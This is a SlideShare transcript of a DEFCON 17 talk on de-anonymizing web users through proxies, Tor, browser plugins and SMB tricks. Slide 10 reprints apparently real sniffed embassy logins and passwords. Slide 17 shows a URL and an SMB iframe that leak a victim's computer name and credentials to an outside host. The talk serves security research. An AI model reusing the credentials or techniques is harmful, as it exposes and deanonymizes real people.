SlideShare a Scribd company logo

Unmasking or De-Anonymizing You

E Hacking
E Hacking

Unmasking is the process to remove mask from the face and to reveal the real identity; at defcon17, Robert “RSnake” Hansen & Joshua “Jabra” Abraham have discussed the concept with demonstration

Internet
1 of 26
Download to read offline
1 Your logo here…
Robert “RSnake” Hansen -CEO SecTheory LLC http://www.sectheory.com http://ha.ckers.org –the lab http://sla.ckers.org –the forum Joshua “Jabra”Abraham Rapid7 LLC -Security Researcher http://www.rapid7.com http://blog.spl0it.org 2
3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee. It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltratedata easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymizethemselves.
7 Basic anonymizationguide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
Well, could this be malicious? Sniff the public key Information System/OS Usernames/Emails Data correlation Tie a user back to a system 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
10 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTMlike Jay Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk- np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau123456
11 Browsers lie about having a same origin policy (or at least are terrible at enforcing it) Pluginslie worse Websites control browsers, not the other way around in a decloakingscenario -Bill Joy (Sun)
12 MrT Plugins History Screen Resolution BeEF VMware detection (IE only) Plugindetection (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Cross-Platform New BeEFModule! Leverage this knowledge in our attacks
14 Java Java internal IP Flash scp:// (winSCP) Word/pdfbugs Media player itms: Already part of decloak.net
15 res:// timing res:// timing without JavaScript smbenum -“Wtf?”
16 SMB enumonly finds certain types of files and only if known prior to testing SMB enumcould also gather usernames through brute force Usernames + res:// timing could gather programs that smbenumalone couldn’t
17 But seriously –that’s just terrible, let’s just get the username and computer name directly! Cut and paste http://ha.ckers.org/log.cgi? rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz SMB <iframesrc="file:///2.2.2.2"> </iframe>
18 Text/Frequency Analysis Header analysis DNS binding and rebinding Etc… etc… Detecting Malice But all that relies on us “trapping” you let’s talk about one more: Log correlation…
19
20
21
22
23
24
25
Robert “RSnake” Hansen http://www.sectheory.com http://ha.ckers.org –the lab http://sla.ckers.org –the forum h_aT_ckers_d0t_org Joshua “Jabra” Abraham http://www.rapid7.com http://blog.spl0it.org http://www.spl0it.org/files/talks/defcon09/ Final version of Slides and Demos Jabra_aT_spl0it_d0t_org

Recommended

Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Security Theatre (PHP Leuven)
Security Theatre (PHP Leuven)Security Theatre (PHP Leuven)
Security Theatre (PHP Leuven)xsist10
 
Open Source Security
Open Source SecurityOpen Source Security
Open Source Securitywremes
 
Reversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensicsReversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensicsAbdulrahman Bassam
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 

Recommended

Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Security Theatre (PHP Leuven)
Security Theatre (PHP Leuven)Security Theatre (PHP Leuven)
Security Theatre (PHP Leuven)xsist10
 
Open Source Security
Open Source SecurityOpen Source Security
Open Source Securitywremes
 
Reversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensicsReversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensicsAbdulrahman Bassam
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
L33t h4x0rz
L33t h4x0rzL33t h4x0rz
L33t h4x0rzJurgen Gaeremyn
 
avast 7.0.1474 license key
avast 7.0.1474 license keyavast 7.0.1474 license key
avast 7.0.1474 license keyHayWhitfield72
 
Top 10 Harmless Geek Pranks For April Fools Day
Top 10 Harmless Geek Pranks For April Fools DayTop 10 Harmless Geek Pranks For April Fools Day
Top 10 Harmless Geek Pranks For April Fools DayDwight Smith
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Locking Down Your WordPress Site
Locking Down Your WordPress SiteLocking Down Your WordPress Site
Locking Down Your WordPress SiteFrank Corso
 
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)ClubHack
 
Beyond Security Theater -- With a CTF
Beyond Security Theater -- With a CTFBeyond Security Theater -- With a CTF
Beyond Security Theater -- With a CTFSam Bowne
 
Inaccessible boot device error in windows 10
Inaccessible boot device error in windows 10Inaccessible boot device error in windows 10
Inaccessible boot device error in windows 10scarlet christer
 
Beyond Security Theater
Beyond Security TheaterBeyond Security Theater
Beyond Security TheaterSam Bowne
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
Passwords: Security vs Usability
Passwords: Security vs UsabilityPasswords: Security vs Usability
Passwords: Security vs UsabilityPer Thorsheim
 
Passwords & security
Passwords & securityPasswords & security
Passwords & securityPer Thorsheim
 
Zombilizing The Web Browser Via Flash Player 9
Zombilizing The Web Browser Via Flash Player 9Zombilizing The Web Browser Via Flash Player 9
Zombilizing The Web Browser Via Flash Player 9thaidn
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.commariagoel7
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockoutJohn Parkinson
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Why vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelWhy vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelKirill Ermakov
 
Security awareness for information security team
Security awareness for information security teamSecurity awareness for information security team
Security awareness for information security teamKirill Ermakov
 
Smart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationSmart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationTom Eston
 
Is your mobile app as secure as you think?
Is your mobile app as secure as you think?Is your mobile app as secure as you think?
Is your mobile app as secure as you think?Matt Lacey
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 

More Related Content

What's hot

avast 7.0.1474 license key
avast 7.0.1474 license keyavast 7.0.1474 license key
avast 7.0.1474 license keyHayWhitfield72
 
Top 10 Harmless Geek Pranks For April Fools Day
Top 10 Harmless Geek Pranks For April Fools DayTop 10 Harmless Geek Pranks For April Fools Day
Top 10 Harmless Geek Pranks For April Fools DayDwight Smith
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Locking Down Your WordPress Site
Locking Down Your WordPress SiteLocking Down Your WordPress Site
Locking Down Your WordPress SiteFrank Corso
 
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)ClubHack
 
Beyond Security Theater -- With a CTF
Beyond Security Theater -- With a CTFBeyond Security Theater -- With a CTF
Beyond Security Theater -- With a CTFSam Bowne
 
Inaccessible boot device error in windows 10
Inaccessible boot device error in windows 10Inaccessible boot device error in windows 10
Inaccessible boot device error in windows 10scarlet christer
 
Beyond Security Theater
Beyond Security TheaterBeyond Security Theater
Beyond Security TheaterSam Bowne
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededFrans Rosén
 
Passwords: Security vs Usability
Passwords: Security vs UsabilityPasswords: Security vs Usability
Passwords: Security vs UsabilityPer Thorsheim
 
Passwords & security
Passwords & securityPasswords & security
Passwords & securityPer Thorsheim
 
Zombilizing The Web Browser Via Flash Player 9
Zombilizing The Web Browser Via Flash Player 9Zombilizing The Web Browser Via Flash Player 9
Zombilizing The Web Browser Via Flash Player 9thaidn
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.commariagoel7
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockoutJohn Parkinson
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Why vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelWhy vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelKirill Ermakov
 
Security awareness for information security team
Security awareness for information security teamSecurity awareness for information security team
Security awareness for information security teamKirill Ermakov
 

What's hot (19)

L33t h4x0rz
L33t h4x0rzL33t h4x0rz
L33t h4x0rz
 
avast 7.0.1474 license key
avast 7.0.1474 license keyavast 7.0.1474 license key
avast 7.0.1474 license key
 
Top 10 Harmless Geek Pranks For April Fools Day
Top 10 Harmless Geek Pranks For April Fools DayTop 10 Harmless Geek Pranks For April Fools Day
Top 10 Harmless Geek Pranks For April Fools Day
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Locking Down Your WordPress Site
Locking Down Your WordPress SiteLocking Down Your WordPress Site
Locking Down Your WordPress Site
 
Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
 
Beyond Security Theater -- With a CTF
Beyond Security Theater -- With a CTFBeyond Security Theater -- With a CTF
Beyond Security Theater -- With a CTF
 
Inaccessible boot device error in windows 10
Inaccessible boot device error in windows 10Inaccessible boot device error in windows 10
Inaccessible boot device error in windows 10
 
Beyond Security Theater
Beyond Security TheaterBeyond Security Theater
Beyond Security Theater
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
Passwords: Security vs Usability
Passwords: Security vs UsabilityPasswords: Security vs Usability
Passwords: Security vs Usability
 
Passwords & security
Passwords & securityPasswords & security
Passwords & security
 
Zombilizing The Web Browser Via Flash Player 9
Zombilizing The Web Browser Via Flash Player 9Zombilizing The Web Browser Via Flash Player 9
Zombilizing The Web Browser Via Flash Player 9
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.com
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 
Why vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheelWhy vulners? Short story about reinventing a wheel
Why vulners? Short story about reinventing a wheel
 
Security awareness for information security team
Security awareness for information security teamSecurity awareness for information security team
Security awareness for information security team
 

Similar to Unmasking or De-Anonymizing You

Smart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationSmart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationTom Eston
 
Is your mobile app as secure as you think?
Is your mobile app as secure as you think?Is your mobile app as secure as you think?
Is your mobile app as secure as you think?Matt Lacey
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 
Lecture about network and host security to NII students
Lecture about network and host security to NII studentsLecture about network and host security to NII students
Lecture about network and host security to NII studentsAkiumi Hasegawa
 
Break IT Down by Josh Smith
Break IT Down by Josh SmithBreak IT Down by Josh Smith
Break IT Down by Josh SmithEC-Council
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-daysZoltan Balazs
 
Secure encryption in a wiretapped future
Secure encryption in a wiretapped futureSecure encryption in a wiretapped future
Secure encryption in a wiretapped futureMichael Renner
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for ActivistsGreg Stromire
 
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped futureOSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped futureNETWAYS
 
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped futureOSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped futureNETWAYS
 
Red teaming the CCDC
Red teaming the CCDCRed teaming the CCDC
Red teaming the CCDCscriptjunkie
 
Hands on Security, Disrupting the Kill Chain, SplunkLive! Austin
Hands on Security, Disrupting the Kill Chain, SplunkLive! AustinHands on Security, Disrupting the Kill Chain, SplunkLive! Austin
Hands on Security, Disrupting the Kill Chain, SplunkLive! AustinSplunk
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)Avansa Mid- en Zuidwest
 
Security Theatre - Benelux
Security Theatre - BeneluxSecurity Theatre - Benelux
Security Theatre - Beneluxxsist10
 

Similar to Unmasking or De-Anonymizing You (20)

Smart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationSmart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and Exploitation
 
Is your mobile app as secure as you think?
Is your mobile app as secure as you think?Is your mobile app as secure as you think?
Is your mobile app as secure as you think?
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)
 
Lecture about network and host security to NII students
Lecture about network and host security to NII studentsLecture about network and host security to NII students
Lecture about network and host security to NII students
 
Break IT Down by Josh Smith
Break IT Down by Josh SmithBreak IT Down by Josh Smith
Break IT Down by Josh Smith
 
Hacking
HackingHacking
Hacking
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
 
Secure encryption in a wiretapped future
Secure encryption in a wiretapped futureSecure encryption in a wiretapped future
Secure encryption in a wiretapped future
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 
Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for Activists
 
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped futureOSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
 
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped futureOSDC 2014: Michael Renner - Secure encryption in a wiretapped future
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
 
Red teaming the CCDC
Red teaming the CCDCRed teaming the CCDC
Red teaming the CCDC
 
Hands on Security, Disrupting the Kill Chain, SplunkLive! Austin
Hands on Security, Disrupting the Kill Chain, SplunkLive! AustinHands on Security, Disrupting the Kill Chain, SplunkLive! Austin
Hands on Security, Disrupting the Kill Chain, SplunkLive! Austin
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
OpenTechTalks: Ethical hacking with Kali Linux (Tijl Deneut, UGent)
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Security Theatre - Benelux
Security Theatre - BeneluxSecurity Theatre - Benelux
Security Theatre - Benelux
 

More from E Hacking

CEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyCEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyE Hacking
 
Threats against the next billion devices
Threats against the next billion devicesThreats against the next billion devices
Threats against the next billion devicesE Hacking
 
High Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilitiesHigh Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilitiesE Hacking
 
New Developments in the BREACH attack
New Developments in the BREACH attackNew Developments in the BREACH attack
New Developments in the BREACH attackE Hacking
 
Exploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit SystemsExploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit SystemsE Hacking
 
Most Important steps to become a hacker
Most Important steps to become a hackerMost Important steps to become a hacker
Most Important steps to become a hackerE Hacking
 
Penetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the BattlefieldPenetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the BattlefieldE Hacking
 
Website fingerprinting on TOR
Website fingerprinting on TORWebsite fingerprinting on TOR
Website fingerprinting on TORE Hacking
 
Fuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidFuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidE Hacking
 
Stalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon TalkStalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon TalkE Hacking
 
Hacking Wireless World, RFID hacking
Hacking Wireless World, RFID hackingHacking Wireless World, RFID hacking
Hacking Wireless World, RFID hackingE Hacking
 
Abusing Microsoft Kerberos - Sorry you guys don’t get it
Abusing Microsoft Kerberos - Sorry you guys don’t get itAbusing Microsoft Kerberos - Sorry you guys don’t get it
Abusing Microsoft Kerberos - Sorry you guys don’t get itE Hacking
 
Malicious Domain Profiling
Malicious Domain Profiling Malicious Domain Profiling
Malicious Domain Profiling E Hacking
 
Searching Shodan For Fun And Profit
Searching Shodan For Fun And ProfitSearching Shodan For Fun And Profit
Searching Shodan For Fun And ProfitE Hacking
 
The Machines that Betrayed their Masters
The Machines that Betrayed their MastersThe Machines that Betrayed their Masters
The Machines that Betrayed their MastersE Hacking
 
Detecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance SystemsDetecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance SystemsE Hacking
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCE Hacking
 
Building Trojan Hardware at Home
Building Trojan Hardware at HomeBuilding Trojan Hardware at Home
Building Trojan Hardware at HomeE Hacking
 
Social Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligenceSocial Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligenceE Hacking
 
LDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperLDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperE Hacking
 

More from E Hacking (20)

CEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyCEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH Academy
 
Threats against the next billion devices
Threats against the next billion devicesThreats against the next billion devices
Threats against the next billion devices
 
High Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilitiesHigh Definition Fuzzing; Exploring HDMI vulnerabilities
High Definition Fuzzing; Exploring HDMI vulnerabilities
 
New Developments in the BREACH attack
New Developments in the BREACH attackNew Developments in the BREACH attack
New Developments in the BREACH attack
 
Exploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit SystemsExploiting Linux On 32-bit and 64-bit Systems
Exploiting Linux On 32-bit and 64-bit Systems
 
Most Important steps to become a hacker
Most Important steps to become a hackerMost Important steps to become a hacker
Most Important steps to become a hacker
 
Penetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the BattlefieldPenetrating the Perimeter - Tales from the Battlefield
Penetrating the Perimeter - Tales from the Battlefield
 
Website fingerprinting on TOR
Website fingerprinting on TORWebsite fingerprinting on TOR
Website fingerprinting on TOR
 
Fuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidFuzzing the Media Framework in Android
Fuzzing the Media Framework in Android
 
Stalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon TalkStalking a City for Fun and Frivolity" Defcon Talk
Stalking a City for Fun and Frivolity" Defcon Talk
 
Hacking Wireless World, RFID hacking
Hacking Wireless World, RFID hackingHacking Wireless World, RFID hacking
Hacking Wireless World, RFID hacking
 
Abusing Microsoft Kerberos - Sorry you guys don’t get it
Abusing Microsoft Kerberos - Sorry you guys don’t get itAbusing Microsoft Kerberos - Sorry you guys don’t get it
Abusing Microsoft Kerberos - Sorry you guys don’t get it
 
Malicious Domain Profiling
Malicious Domain Profiling Malicious Domain Profiling
Malicious Domain Profiling
 
Searching Shodan For Fun And Profit
Searching Shodan For Fun And ProfitSearching Shodan For Fun And Profit
Searching Shodan For Fun And Profit
 
The Machines that Betrayed their Masters
The Machines that Betrayed their MastersThe Machines that Betrayed their Masters
The Machines that Betrayed their Masters
 
Detecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance SystemsDetecting Bluetooth Surveillance Systems
Detecting Bluetooth Surveillance Systems
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POC
 
Building Trojan Hardware at Home
Building Trojan Hardware at HomeBuilding Trojan Hardware at Home
Building Trojan Hardware at Home
 
Social Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligenceSocial Media Monitoring tools as an OSINT platform for intelligence
Social Media Monitoring tools as an OSINT platform for intelligence
 
LDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections PaperLDAP Injections & Blind LDAP Injections Paper
LDAP Injections & Blind LDAP Injections Paper
 

Recently uploaded

Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
NSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationNSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationMarko4394
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleanscorenetworkseo
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhimiss dipika
 
